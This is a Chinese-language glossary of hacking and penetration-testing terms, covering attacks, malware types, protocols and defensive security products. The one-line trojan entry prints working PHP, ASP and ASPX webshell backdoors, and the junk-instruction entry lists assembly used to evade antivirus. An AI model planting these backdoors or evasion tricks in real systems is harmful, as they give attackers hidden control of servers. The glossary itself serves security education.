渗透术语

渗透测试基础知识

渗透测试扫盲篇

肉鸡

所谓“肉鸡”是一种很形象的比喻，比喻那些可以随意被我们控制的电脑，对方可以是WINDOWS系统，也可以是UNIX/LINUX系统，可以是普通的个人电脑，也可以是大型的服务器，我们可以像操作自己的电脑那样来操作它们，而不被对方所发觉。

木马

就是那些表面上伪装成了正常的程序，但是当这些被程序运行时，就会获取系统的整个控制权限。有很多黑客就是热衷于使用木马程序来控制别人的电脑，比如灰鸽子，黑洞，PcShare等等。

远控

远程控制，是在网络上由一台电脑（主控端Remote/客户端）远距离去控制另一台电脑（被控端Host/服务器端）的技术，这里的远程不是字面意思的远距离，一般指通过网络控制远端电脑。

网页木马

表面上伪装成普通的网页文件或是将自已的代码直接插入到正常的网页文件中，当有人访问时，网页木马就会利用对方系统或者浏览器的漏洞自动将配置好的木马下载到访问者的电脑上来自动执行。

黑页

一些计算机被入侵后，入侵者为了证明自己的存在，对网站主页（在服务器开放WEB服务的情况下）进行改写，从而公布入侵者留下的信息，这样的网页通常称为黑页。

挂马

就是在别人的网站文件里面放入网页木马或者是将代码潜入到对方正常的网页文件里，以使浏览者中马。

大马

功能强大的网页后门，能执行命令，操作文件，连接数据库

小马

比较单一的网页后门。一般是上传保存大马。asp小马asp旁注小马

一句话木马

一段很小的网页代码后门，可以用客户端连接，对网站进行控制。如中国菜刀。服务端是一句话后门。

php的一句话木马： <?php @eval($_POST['pass']);?>
asp的一句话是：   <%eval request ("pass")%>
aspx的一句话是：  <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

后门

这是一种形象的比喻，攻击者在利用某些方法成功的控制了目标主机后，可以在对方的系统中植入特定的程序，或者是修改某些设置。这些改动表面上是很难被察觉的，但是攻击者却可以使用相应的程序或者方法来轻易的与这台电脑建立连接，重新控制这台电脑。

就好象是攻击者偷偷的配了一把主人房间的钥匙，可以随时进出而不被主人发现一样。通常大多数的特洛伊木马（TrojanHorse）程序都可以被攻击者用于制作后门（BackDoor）

拖库

拖库本来是数据库领域的术语，指从数据库中导出数据。

现在是指：黑客入侵数据库后把数据库导出来。

社工库

社工库是黑客与大数据方式进行结合的一种产物。

黑客们将泄漏的用户数据整合分析，然后集中归档的一个地方。

撞库

撞库是黑客通过收集互联网已泄露的用户和密码信息，生成对应的字典表，尝试批量登陆其他网站后，得到一系列可以登录的用户。很多用户在不同网站使用的是相同的帐号密码，因此黑客可以通过获取用户在A网站的账户从而尝试登录B网址，这就可以理解为撞库攻击。

提权

提权，顾名思义就是提高自己在服务器中的权限，就比如在windows中你本身登录的用户是guest，然后通过提权后就变成超级管理员，拥有了管理Windows的所有权限。提权是黑客的专业名词，一般用于网站入侵和系统入侵中。

网络钓鱼

网络钓鱼(Phishing)一词，是“Fishing”和“Phone”的综合体，由于黑客始祖起初是以电话作案，所以用“Ph”来取代“F”，创造了“Phishing”。

然而，当今的“网络钓鱼”攻击利用欺骗性的电子邮件和伪造的Web站点来进行诈骗活动，受骗者往往会泄露自己的财务数据，如信用卡号、账户用户名、口令和社保编号等内容。

社会工程学攻击

社会工程学攻击是一种通过对被攻击者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱所采取的诸如欺骗、伤害等危害手段，获取自身利益的手法。

黑客社会工程学攻击则是将黑客入侵攻击手段进行了最大化，不仅能够利用系统的弱点进行入侵，还能通过人性的弱点进行入侵，当黑客攻击与社会工程学攻击融为一体时，将根本不存在所谓安全的系统

rootkit

rootkit是攻击者用来隐藏自己的行踪和保留root（根权限，可以理解成WINDOWS下的system或者管理员权限）访问权限的工具。

通常，攻击者通过远程攻击的方式获得root访问权限，或者是先使用密码猜解（破解）的方式获得对系统的普通访问权限，进入系统后，再通过，对方系统内存在的安全漏洞获得系统的root权限。

然后，攻击者就会在对方的系统中安装rootkit，以达到自己长久控制对方的目的，rootkit与我们前边提到的木马和后门很类似，但远比它们要隐蔽，黑客守卫者就是很典型的rootkit，还有国内的ntroorkit等都是不错的rootkit工具。

IPC$

是共享“命名管道”的资源，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限.

在远程管理计算机和查看计算机的共享资源时使用。

弱口令

那些强度不够，容易被猜解的，类似123，abc这样的口令（密码）

默认共享

默认共享是WINDOWS2000/XP/2003系统开启共享服务时自动开启所有硬盘的共享，因为加了”$”符号，所以看不到共享的托手图表，也成为隐藏共享。

shell

指的是一种命令指行环境，比如我们按下键盘上的“开始键+R”时出现“运行”对话框，在里面输入“cmd”会出现一个用于执行命令的黑窗口，这个就是WINDOWS的Shell执行环境。

通常我们使用远程溢出程序成功溢出远程电脑后得到的那个用于执行系统命令的环境就是对方的shell。

交互式shell

交互式模式就是shell等待你的输入，并且执行你提交的命令。这种模式被称作交互式是因为shell与用户进行交互。这种模式也是大多数用户非常熟悉的：登录、执行一些命令、签退。当你签退后，shell也终止了。

webshell

webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称做是一种网页后门。

黑客在hack了一个网站后，通常会将这些asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起。

之后就可以使用浏览器来访问这些asp或者php后门，得到一个命令执行环境，以达到控制网站服务器的目的。可以上传下载文件，查看数据库，执行任意程序命令等。国内常用的webshell有海阳ASP木马，Phpspy，c99shell等。

溢出

确切的讲，应该是“缓冲区溢出”。

简单的解释就是程序对接受的输入数据没有执行有效的检测而导致错误，后果可能是造成程序崩溃或者是执行攻击者的命令。

大致可以分为两类：（1）堆溢出（2）栈溢出。

注入

用户可以提交一段数据库查询代码，根据程序返回的结果，获得某些他想要知道的数据，这个就是所谓的SQLinjection，即：SQL恶意注入。

注入点

以实行注入的地方，通常是一个访问数据库的连接。

根据注入点数据库的运行帐号的权限的不同，你所得到的权限也不同。

旁站入侵

同一个服务器上有多个站点，可以通过入侵其中一个站点，通过提权跨目录访问其他站点。

C段渗透

C段下服务器入侵同一个网段内

例如 202.202.0.1-2020.0.254如果拿下其中一台服务器，通过这台服务器嗅探目标服务器传输上的数据。从而获取这台服务器的权限。常见的工具有cain。

内网

通俗的讲就是局域网，比如网吧，校园网，公司内部网等都属于此类。

查看IP地址如果是在以下三个范围之内的话，就说明我们是处于内网之中的：10.0.0.0—10.255.255.255，172.16.0.0—172.31.255.255，192.168.0.0—192.168.255.255

外网

直接连入INTERNET（互连网），可以与互连网上的任意一台电脑互相访问，IP地址不是保留IP（内网）IP地址。

中间人攻击

中间人攻击（Man-in-the-MiddleAttack，简称“MITM攻击”）中间人攻击很早就成为了黑客常用的一种古老的攻击手段，并且一直到如今还具有极大的扩展空间。在网络安全方面，MITM攻击的使用是很广泛的，曾经猖獗一时的SMB会话劫持、DNS欺骗等技术都是典型的MITM攻击手段。在黑客技术越来越多的运用于以获取经济利益为目标的情况下时，MITM攻击成为对网银、网游、网上交易等最有威胁并且最具破坏性的一种攻击方式。

端口

（Port）相当于一种数据的传输通道。用于接受某些数据，然后传输给相应的服务，而电脑将这些数据处理后，再将相应的恢复通过开启的端口传给对方。一般每一个端口的开放的偶对应了相应的服务，要关闭这些端口只需要将对应的服务关闭就可以了

免杀

就是通过加壳、加密、修改特征码、加花指令等等技术来修改程序，使其逃过杀毒软件的查杀。

加壳

就是利用特殊的算法，将EXE可执行程序或者DLL动态连接库文件的编码进行改变（比如实现压缩、加密），以达到缩小文件体积或者加密程序编码，甚至是躲过杀毒软件查杀的目的。目前较常用的壳有UPX，ASPack、PePack、PECompact、UPack、免疫007、木马彩衣等等。

花指令

就是几句汇编指令，让汇编语句进行一些跳转，使得杀毒软件不能正常的判断病毒文件的构造。

说通俗点就是”杀毒软件是从头到脚按顺序来查找病毒。如果我们把病毒的头和脚颠倒位置，杀毒软件就找不到病毒了“。

• push ebp —-把基址指针寄存器压入堆栈
• pop ebp —-把基址指针寄存器弹出堆栈
• push eax —-把数据寄存器压入堆栈
• pop eax —-把数据寄存器弹出堆栈
• nop —–不执行
• add esp,1—–指针寄存器加1
• sub esp,-1—–指针寄存器加1
• add esp,-1——–指针寄存器减1
• sub esp,1—–指针寄存器减1
• inc ecx —–计数器加1
• dec ecx —–计数器减1
• sub esp,1 —-指针寄存器-1
• sub esp,-1—-指针寄存器加1
• jmp 入口地址—-跳到程序入口地址
• push 入口地址—把入口地址压入堆栈
• retn —— 反回到入口地址,效果与jmp入口地址一样.
• mov eax,入口地址——把入口地址转送到数据寄存器中.
• jmp eax —– 跳到程序入口地址
• jb 入口地址
• jnb 入口地址 ——效果和jmp入口地址一样,直接

TCP/IP

是一种网络通信协议，他规范了网络上所有的通信设备，尤其是一个主机与另一个主机之间的数据往来格式以及传送方式.，TCP/IP是INTERNET的基础协议，也是一种电脑数据打包和寻址的标准方法.

在数据传送中，可以形象地理解为两个信封，TCP和IP就像是信封，要传递的信息被划为若干段，每一段塞入一个TCP信封，并在该信封面上记录有分段号的信息，再将TCP信封塞入IP大信封，发送上网.。

路由器

应该是在网络上使用最高的设备之一了，它的主要作用就是路由选择，将IP数据报正确的送到目的地，因此也叫IP路由器.

蜜罐

好比是情报收集系统。蜜罐好象是故意让人攻击的目标，引诱黑客来攻击，所以攻击者攻击后，你就可以知道他是如何得逞的，随时了解针对你的服务器发动的最新的攻击和漏洞.还可以通过窃听黑客之间的联系，收集黑客所用的种种工具，并且掌握他们的社交网络.。

拒绝服务攻击

拒绝服务攻击 DOS是DENIALOFSERVICE的简称，即拒绝服务，造成DOS的攻击行为被称为DOS攻击，其目的是使计算机或网络无法正常服务。

最常见的DOS攻击有计算机网络宽带攻击和连通性攻击，连通性攻击指用大量的连接请求冲击计算机，使得所有可用的操作系统资源被消耗，最终计算机无法再处理合法用户的请求.。

cc攻击

攻击者借助代理服务器生成指向受害主机的合法请求，实现DDOS和伪装就叫：CC(ChallengeCollapsar)。

sql注入

把SQL命令插入到WEB表单的输入域或页面请求的查询字符串，欺骗服务器执行恶意的SQL命令。

在某些表单中，用户输入的内容直接用来构造动态的SQL命令，或作为存储过程的输入参数，这类表单特别容易受到SQL注入式攻击

加密技术

利用技术手段把重要的数据变为乱码（加密）传送，到达目的地后再用相同或不同的手段还原（解密）。加密技术包括两个元素：算法和密钥。算法是将普通的信息或者可以理解的信息与一串数字（密钥）结合，产生不可理解的密文的步骤，密钥是用来对数据进行编码和解密的一种算法。在安全保密中，可通过适当的钥加密技术和管理机制来保证网络的信息通信安全。

局域网内部ARP攻击

ARP（AddressResolutionProtocol，地址解析协议）协议的基本功能就是通过目标设备的IP地址，查询目标设备的MAC地址，以保证通信的进行。

基于ARP协议的这一工作特性，黑客向对方计算机不断发送有欺诈性质的ARP数据包，数据包内包含有与当前设备重复的Mac地址，使对方在回应报文时，由于简单的地址重复错误而导致不能进行正常的网络通信。一般情况下，受到ARP攻击的计算机会出现两种现象：

1.不断弹出“本机的XXX段硬件地址与网络中的XXX段地址冲突”的对话框。

2.计算机不能正常上网，出现网络中断的症状。

因为这种攻击是利用ARP请求报文进行“欺骗”的，所以防火墙会误以为是正常的请求数据包，不予拦截。因此普通的防火墙很难抵挡这种攻击。

什么叫欺骗攻击？他有哪些攻击方式？

网络欺骗的技术主要有：HONEYPOT和分布式HONEYPOT、欺骗空间技术等。主要方式有：IP欺骗、ARP欺骗、DNS欺骗、Web欺骗、电子邮件欺骗、源路由欺骗（通过指定路由，以假冒身份与其他主机进行合法通信或发送假报文，使受攻击主机出现错误动作）、地址欺骗（包括伪造源地址和伪造中间站点）等。

嗅探

就是窃听网络上流经的数据包，而数据包里面一般会包含很多重要的私隐信息，

跳板

一个具有辅助作用的机器，利用这个主机作为一个间接工具，控制其他主机，一般和肉鸡连用。

权限

计算机用户对于文件及目录的建立，修改，删除以及对于某些服务的访问，程序的执行，是以权限的形式来严格区分的。被赋予了相应的权限，就可以进行相应的操作，否则就不可以。

ip地址

internet上的电脑有许多，为了让他们能够相互识别，internet上的每一台主机都分配有一个唯一的32位地址，该地址称为ip地址，也称作网际地址，ip地址由4个数值部分组成，每个数值部分可取值0-255，各部分之间用一个‘.‘分开.

RARP反向地址解析协议

RARP反向地址解析协议(ReverseAddressResolutionProtocol)，

此协议将硬件地址映射到网络地址。

UDP用户数据报协议

UDP是UserDatagram Protocol的简称，中文名是用户数据报协议。

是OSI（OpenSystem Interconnection，开放式系统互联）参考模型中一种无连接的传输层协议，提供面向事务的简单不可靠信息传送服务。

TCP协议

传输控制协议（TCP，TransmissionControl Protocol）是一种面向连接的、可靠的、基于字节流的传输层通信协议。

三次握手：

四次挥手：

FTP文件传输协议

文件传输协议(FileTransferProtocol)，允许用户以文件操作的方式（文件的增、删、改、查、传送等）与另一主机相互通信。

SMTP简单邮件传送协议

简单邮件传送协议(SimpleMailTransferProtocol)，SMTP协议为系统之间传送电子邮件。

TELENT终端协议

终端协议(TelTerminalProcotol)，允许用户以虚终端方式访问远程主机。

HTTP

超文本传输协议（HypertextTransferProtocol，HTTP）是一个简单的请求-响应协议，它通常运行在TCP之上。它指定了客户端可能发送给服务器什么样的消息以及得到什么样的响应。

HTTPS

HTTPS：安全超文本传输协议。通过在安全套接字层（SSL）协议上运行超文本传输协议来将安全添加到万维网中。HTTPS能用于将WEB服务器认证到客户，将客户认证到WEB服务器和加密在两个系统之间传输的所有数据，HTTPS服务器一般监听TCP端口443。

TFTP

简单文件传输协议(TrivialFileTransferProtocol)

ICMP协议

ICMP（全称是InterControlMessageProtocol，即Inter控制消息协议）用于在IP主机、路由器之间传递控制消息，包括网络通不通、主机是否可达、路由是否可用等网络本身的消息。

例如，我们在检测网络通不通时常会使用Ping命令，Ping执行操作的过程就是ICMP协议工作的过程。“ICMP协议”对于网络安全有着极其重要的意义，其本身的特性决定了它非常容易被用于攻击网络上的路由器和主机。

例如，曾经轰动一时的海信主页被黑事件就是以ICMP攻击为主的。由于操作系统规定ICMP数据包最大尺寸不超过64KB，因而如果向目标主机发送超过64KB上限的数据包，该主机就会出现内存分配错误，进而导致系统耗费大量的资源处理，疲于奔命，最终瘫痪、死机。

dns协议

DNS协议就是用来将域名解析到IP地址的一种协议，当然，也可以将IP地址转换为域名的一种协议。

Root

Unix里最高权限的用户，也就是超级管理员。

EXP/Exploit

漏洞利用代码，运行之后对目标进行攻击。

POC / Proff of Concept

漏洞验证代码，检测目标是否存在对应漏洞

Payload

指成功exploit之后，真正在目标系统执行的代码或指令。

shellcode

是Payload的一种，由于其建立正向/反向shell而得名。

软件加壳

“壳”是一段专门负责保护软件不被非法修改或反编译的程序。它们一般都是先于程序运行，拿到控制权，然后完成它们保护软件的任务。

经过加壳的软件在跟踪时已看到其真实的十六进制代码，因此可以起到保护软件的目的。

软件脱壳

顾名思义，就是利用相应的工具，把在软件“外面”起保护作用的“壳”程序去除，还文件本来面目，这样再修改文件内容就容易多了。

蠕虫病毒

它利用了WINDOWS系统的开放性特点，特别是COM到COM+的组件编程思路，一个脚本程序能调用功能更大的组件来完成自己的功能。以VB脚本病毒为例，它们都是把VBS脚本文件加在附件中，使用*.HTM，VBS等欺骗性的文件名。

蠕虫病毒的主要特性有：自我复制能力、很强的传播性、潜伏性、特定的触发性、很大的破坏性。

LAN

局域网！一种网络，连接近距离的计算机，一般位于单个房间、建筑物或小的地理区域里。LAN上的所有系统位于一个网络跳之间。

Proxy

代理。一类程序或系统，接收来自客户机算计的流量，并代表客户与服务器交互。代理能用于过滤应用级别的制定类型的流量或缓存信息以提高性能。许多防火墙依赖代理进行过滤。

HTML

超文本标记语言（英语：HyperTextMarkup Language，简称：HTML）是一种用于创建网页的标准标记语言。

您可以使用HTML 来建立自己的WEB 站点，HTML运行在浏览器上，由浏览器来解析。

css层叠样式表

层叠样式表(英文全称：CascadingStyleSheets)是一种用来表现HTML（标准通用标记语言的一个应用）或XML（标准通用标记语言的一个子集）等文件样式的计算机语言。

CSS不仅可以静态地修饰网页，还可以配合各种脚本语言动态地对网页各元素进行格式化。

JavaScript

是一种属于网络的高级脚本语言,已经被广泛用于Web应用开发,常用来为网页添加各式各样的动态功能,为用户提供更流畅美观的浏览效果。

通常JavaScript脚本是通过嵌入在HTML中来实现自身的功能的。

CMS

CMS是ContentManagement System的缩写，意为”内容管理系统”。

独立服务器

独立服务器整体硬件都是独立的，性能强大，特别是CPU，被认为是性能最佳的托管选项之一。使用真实存在的独立服务器就像拥有自己的房子，没有人打扰，可以部署任何想要的东西。

VPS

VPS主机是一项服务器虚拟化和自动化技术，它采用的是操作系统虚拟化技术。

操作系统虚拟化的概念是基于共用操作系统内核，这样虚拟服务器就无需额外的虚拟化内核的过程，因而虚拟过程资源损耗就更低，从而可以在一台物理服务器上实现更多的虚拟化服务器。这些VPS主机以最大化的效率共享硬件、软件许可证以及管理资源。

每一个VPS主机均可独立进行重启，并拥有自己的root访问权限、用户、IP地址、内存、过程、文件、应用程序、系统函数库以及配置文件。

域名

域名（英语：DomainName），又称网域，是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称，用于在数据传输时对计算机的定位标识（有时也指地理位置）

CTF

CTF（CaptureThe Flag）中文一般译作夺旗赛，在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。

awd攻防对抗赛

AWD(AttackWithDefense，攻防兼备)模式是一个非常有意思的模式，你需要在一场比赛里要扮演攻击方和防守方，攻者得分，失守者会被扣分。也就是说，攻击别人的靶机可以获取Flag分数时，别人会被扣分，同时你也要保护自己的主机不被别人得分，以防扣分。

cve

CVE的英文全称是“CommonVulnerabilities & Exposures”通用漏洞披露。

CNVD

国家信息安全漏洞共享平台，简称CNVD，国家计算机网络应急技术处理协调中心联合建立的信息安全漏洞信息共享知识库。

主要目标提升我国在安全漏洞方面的整体研究水平和及时预防能力，带动国内相关安全产品的发展。

APT攻击

dvancedPersistentThreat，高级可持续性攻击，是指组织（特别是政府）或者小团体利用先进的攻击手段对特定目标进行长期持续性网络攻击的供给形式（极强的隐蔽性、潜伏期长，持续性强、目标性强）

渗透测试

渗透测试：黑盒测试、白盒测试、灰盒测试

暗网

“暗网”是指隐藏的网络，普通网民无法通过常规手段搜索访问，需要使用一些特定的软件、配置或者授权等才能登录。

一般用tor洋葱浏览器进入。暗网是利用加密传输、P2P对等网络、多点中继混淆等，为用户提供匿名的互联网信息访问的一类技术手段，其最突出的特点就是匿名性。

恶意软件

被设计来达到非授权控制计算机或窃取计算机数据等多种恶意行为的程序。

间谍软件

一种能够在用户不知情的情况下，在其电脑、手机上安装后门，具备收集用户信息、监听、偷拍等功能的软件。

洪水攻击

是黑客比较常用的一种攻击技术，特点是实施简单，威力巨大，大多是无视防御的。

从定义上说，攻击者对网络资源发送过量数据时就发生了洪水攻击，这个网络资源可以是router，switch，host，application等。

洪水攻击将攻击流量比作成洪水，只要攻击流量足够大，就可以将防御手段打穿。DDoS攻击便是洪水攻击的一种。

SYN攻击

利用操作系统TCP协议设计上的问题执行的拒绝服务攻击，涉及TCP建立连接时三次握手的设计。

DoS攻击

拒绝服务攻击。攻击者通过利用漏洞或发送大量的请求导致攻击对象无法访问网络或者网站无法被访问。

DDoS

分布式DOS攻击，常见的UDP、SYN、反射放大攻击等等，就是通过许多台肉鸡一起向你发送一些网络请求信息，导致你的网络堵塞而不能正常上网。

抓鸡

即设法控制电脑，将其沦为肉鸡。

端口扫描

端口扫描是指发送一组端口扫描消息，通过它了解到从哪里可探寻到攻击弱点，并了解其提供的计算机网络服务类型，试图以此侵入某台计算机。

反弹端口

防火墙对于连入的连接往往会进行非常严格的过滤，但是对于连出的连接却疏于防范。

于是，利用这一特性，反弹端口型软件的服务端(被控制端)会主动连接客户端(控制端)，就给人“被控制端主动连接控制端的假象，让人麻痹大意。

鱼叉攻击

鱼叉攻击是将用鱼叉捕鱼形象的引入到了网络攻击中，主要是指可以使欺骗性电子邮件看起来更加可信的网络钓鱼攻击，具有更高的成功可能性。

不同于撒网式的网络钓鱼，鱼叉攻击往往更加具备针对性，攻击者往往“见鱼而使叉”。

为了实现这一目标，攻击者将尝试在目标上收集尽可能多的信息。通常，组织内的特定个人存在某些安全漏洞。

钓鲸攻击

捕鲸是另一种进化形式的鱼叉式网络钓鱼。它指的是针对高级管理人员和组织内其他高级人员的网络钓鱼攻击。

通过使电子邮件内容具有个性化并专门针对相关目标进行定制的攻击。

水坑攻击

顾名思义，是在受害者必经之路设置了一个“水坑(陷阱)”。

最常见的做法是，黑客分析攻击目标的上网活动规律，寻找攻击目标经常访问的网站的弱点，先将此网站“攻破”并植入攻击代码，一旦攻击目标访问该网站就会“中招”。

C2

C2全称为CommandandControl，命令与控制，常见于APT攻击场景中。作动词解释时理解为恶意软件与攻击者进行交互，作名词解释时理解为攻击者的“基础设施”。

供应链攻击

是黑客攻击目标机构的合作伙伴，并以该合作伙为跳板，达到渗透目标用户的目的。

一种常见的表现形式为，用户对厂商产品的信任，在厂商产品下载安装或者更新时进行恶意软件植入进行攻击。

所以，在某些软件下载平台下载的时候，若遭遇捆绑软件，就得小心了！

渗透

就是通过扫描检测你的网络设备及系统有没有安全漏洞，有的话就可能被入侵，就像一滴水透过一块有漏洞的木板，渗透成功就是系统被入侵。

横移

指攻击者入侵后，从立足点在内部网络进行拓展，搜寻控制更多的系统。

暗链

看不见的网站链接，“暗链”在网站中的链接做得非常隐蔽，短时间内不易被搜索引擎察觉。

它和友情链接有相似之处，可以有效地提高网站权重。

爆库

入侵网站的一种手法，通过恶意代码让网站爆出其一些敏感数据来。

薅羊毛

指网赚一族利用各种网络金融产品或红包活动推广下线抽成赚钱，又泛指搜集各个银行等金融机构及各类商家的优惠信息，以此实现盈利的目的。这类行为就被称之为薅羊毛。

商业电子邮件攻击（BEC）

也被称为“变脸诈骗”攻击，这是针对高层管理人员的攻击，攻击者通常冒充（盗用）决策者的邮件，来下达与资金、利益相关的指令；或者攻击者依赖社会工程学制作电子邮件，说服/诱导高管短时间进行经济交易。

电信诈骗

是指通过电话、网络和短信方式，编造虚假信息，设置骗局，对受害人实施远程、非接触式诈骗，诱使受害人打款或转账的犯罪行为，通常以冒充他人及仿冒、伪造各种合法外衣和形式的方式达到欺骗的目的。

杀猪盘

网络流行词，电信诈骗的一种，是一种网络交友诱导股票投资、赌博等类型的诈骗方式。

“杀猪盘”则是“从业者们”自己起的名字，是指放长线“养猪”诈骗，养得越久，诈骗得越狠。

黑产

网络黑产，指以互联网为媒介，以网络技术为主要手段，为计算机信息系统安全和网络空间管理秩序，甚至国家安全、社会政治稳定带来潜在威胁（重大安全隐患）的非法行为。

例如非法数据交易产业。

黑帽黑客

以非法目的进行黑客攻击的人，通常是为了经济利益。他们进入安全网络以销毁、赎回、修改或窃取数据，或使网络无法用于授权用户。

这个名字来源于这样一个历史：老式的黑白西部电影中，恶棍很容易被电影观众识别，因为他们戴着黑帽子，而“好人”则戴着白帽子。

白帽黑客

是那些用自己的黑客技术来进行合法的安全测试分析的黑客，测试网络和系统的性能来判定它们能够承受入侵的强弱程度。

红帽黑客

事实上最为人所接受的说法叫红客。

红帽黑客以正义、道德、进步、强大为宗旨，以热爱祖国、坚持正义、开拓进取为精神支柱，红客通常会利用自己掌握的技术去维护国内网络的安全，并对外来的进攻进行还击。

红队

通常指攻防演习中的攻击队伍。

蓝队

通常指攻防演习中的防守队伍。

紫队

攻防演习中新近诞生的一方，通常指监理方或者裁判方。

加密机

主机加密设备，加密机和主机之间使用TCP/IP协议通信，所以加密机对主机的类型和主机操作系统无任何特殊的要求。

CA证书

为实现双方安全通信提供了电子认证。

在因特网、公司内部网或外部网中，使用数字证书实现身份识别和电子信息加密。

数字证书中含有密钥对（公钥和私钥）所有者的识别信息，通过验证识别信息的真伪实现对证书持有者身份的认证。

SSL证书

SSL证书是数字证书的一种，类似于驾驶证、护照和营业执照的电子副本。

因为配置在服务器上，也称为SSL服务器证书。

防火墙

主要部署于不同网络或网络安全域之间的出口，通过监测、限制、更改跨越防火墙的数据流，尽可能地对外部屏蔽网络内部的信息、结构和运行状况，有选择地接受外部访问。

IDS

入侵检测系统，用于在黑客发起进攻或是发起进攻之前检测到攻击，并加以拦截。

IDS是不同于防火墙。防火墙只能屏蔽入侵，而IDS却可以在入侵发生以前，通过一些信息来检测到即将发生的攻击或是入侵并作出反应。

NIDS

NetworkIntrusion Detection System的缩写，即网络入侵检测系统，主要用于检测Hacker或Cracker。

通过网络进行的入侵行为。NIDS的运行方式有两种，一种是在目标主机上运行以监测其本身的通信信息，另一种是在一台单独的机器上运行以监测所有网络设备的通信信息，比如Hub、路由器。

IPS

IPS全称为Intrusion-PreventionSystem，即入侵防御系统，目的在于及时识别攻击程序或有害代码及其克隆和变种，采取预防措施，先其阻止入侵，防患于未然。

或者至少使其危害性充分降低。入侵预防系统一般作为防火墙和防病毒软件的补充来投入使用。

杀毒软件

也称反病毒软件或防毒软件，是用于消除电脑病毒、特洛伊木马和恶意软件等计算机威胁的一类软件。

反病毒引擎

通俗理解，就是一套判断特定程序行为是否为病毒程序（包括可疑的）的技术机制。

防毒墙

区别于部署在主机上的杀毒软件，防毒墙的部署方式与防火墙类似，主要部署于网络出口，用于对病毒进行扫描和拦截，因此防毒墙也被称为反病毒网关。

告警

指网络安全设备对攻击行为产生的警报。

误报

也称为无效告警，通常指告警错误，即把合法行为判断成非法行为而产生了告警。

目前，由于攻击技术的快速进步和检测技术的限制，误报的数量非常大，使得安全人员不得不花费大量时间来处理此类告警，已经成为困扰并拉低日常安全处置效率的主要原因。

漏报

通常指网络安全设备没有检测出非法行为而没有产生告警。一旦出现漏报，将大幅增加系统被入侵的风险。

NAC

全称为NetworkAccess Control，即网络准入控制，其宗旨是防止病毒和蠕虫等新兴黑客技术对企业安全造成危害。

借助NAC，客户可以只允许合法的、值得信任的终端设备（例如PC、服务器、PDA）接入网络，而不允许其它设备接入。

漏扫

即漏洞扫描，指基于漏洞数据库，通过扫描等手段对指定的远程或者本地计算机系统的安全脆弱性进行检测，发现可利用漏洞的一种安全检测（渗透攻击）行为。

UTM

即UnifiedThreatManagement，中文名为统一威胁管理，最早由IDC于2014年提出。

即将不同设备的安全能力（最早包括入侵检测、防火墙和反病毒技术），集中在同一网关上，实现统一管理和运维。

网闸

网闸是使用带有多种控制功能的固态开关读写介质，连接两个独立主机系统的信息安全设备。

由于两个独立的主机系统通过网闸进行隔离，只有以数据文件形式进行的无协议摆渡。

堡垒机

运用各种技术手段监控和记录运维人员对网络内的服务器、网络设备、安全设备、数据库等设备的操作行为，以便集中报警、及时处理及审计定责。

数据库审计

能够实时记录网络上的数据库活动，对数据库操作进行细粒度审计的合规性管理，对数据库遭受到的风险行为进行告警，对攻击行为进行阻断。

它通过对用户访问数据库行为的记录、分析和汇报，用来帮助用户事后生成合规报告、事故追根溯源，同时加强内外部数据库网络行为记录，提高数据资产安全。

DLP

数据防泄漏，通过数字资产的精准识别和策略制定，主要用于防止企业的指定数据或信息资产以违反安全策略规定的形式流出企业。

VPN

虚拟专用网，在公用网络上建立专用网络，进行加密通讯，通过对数据包的加密和数据包目标地址的转换实现远程访问。

SD-WAN

即软件定义广域网，这种服务用于连接广阔地理范围的企业网络、数据中心、互联网应用及云服务。

这种服务的典型特征是将网络控制能力通过软件方式云化。

通常情况下，SD-WAN都集成有防火墙、入侵检测或者防病毒能力。并且从目前的趋势来看，以安全为核心设计的SD-WAN正在崭露头角，包括奇安信、Fortinet等多家安全厂商开始涉足该领域，并提供了较为完备的内生安全设计。

路由器

是用来连接不同子网的中枢，它们工作于OSI7层模型的传输层和网络层。

路由器的基本功能就是将网络信息包传输到它们的目的地。一些路由器还有访问控制列表（ACLs），允许将不想要的信息包过滤出去。

许多路由器都可以将它们的日志信息注入到IDS系统中，并且自带基础的包过滤（即防火墙）功能。

网关

通常指路由器、防火墙、IDS、VPN等边界网络设备。

WAF

即WebApplicationFirewall，即Web应用防火墙，是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。

SOC

即SecurityOperationsCenter，翻译为安全运行中心或者安全管理平台，通过建立一套实时的资产风险模型，协助管理员进行事件分析、风险分析、预警管理和应急响应处理的集中安全管理系统。

LAS

日志审计系统，主要功能是提供日志的收集、检索和分析能力，可为威胁检测提供丰富的上下文。

NOC

即NetworkOperationsCenter，网络操作中心或网络运行中心，是远程网络通讯的管理、监视和维护中心，是网络问题解决、软件分发和修改、路由、域名管理、性能监视的焦点。

SIEM

即SecurityInformation and EventManagement，安全信息和事件管理，负责从大量企业安全控件、主机操作系统、企业应用和企业使用的其他软件收集安全日志数据，并进行分析和报告。

上网行为管理

是指帮助互联网用户控制和管理对互联网使用的设备。

其包括对网页访问过滤、上网隐私保护、网络应用控制、带宽流量管理、信息收发审计、用户行为分析等。

蜜罐（Honeypot）

是一个包含漏洞的系统，它摸拟一个或多个易受攻击的主机，给黑客提供一个容易攻击的目标。

由于蜜罐没有其它任务需要完成，因此所有连接的尝试都应被视为是可疑的。

蜜罐的另一个用途是拖延攻击者对其真正目标的攻击，让攻击者在蜜罐上浪费时间。蜜罐类产品包括蜜网、蜜系统、蜜账号等等。

沙箱

沙箱是一种用于安全的运行程序的机制。它常常用来执行那些非可信的程序。

非可信程序中的恶意代码对系统的影响将会被限制在沙箱内而不会影响到系统的其它部分。

沙箱逃逸

一种识别沙箱环境，并利用静默、欺骗等技术，绕过沙箱检测的现象

网络靶场

主要是指通过虚拟环境与真实设备相结合，模拟仿真出真实赛博网络空间攻防作战环境，能够支撑攻防演练、安全教育、网络空间作战能力研究和网络武器装备验证试验平台。

加密技术

加密技术包括两个元素：算法和密钥。

算法是将普通的文本与一串数字（密钥）的结合，产生不可理解的密文的步骤，密钥是用来对数据进行编码和解码的一种算法。

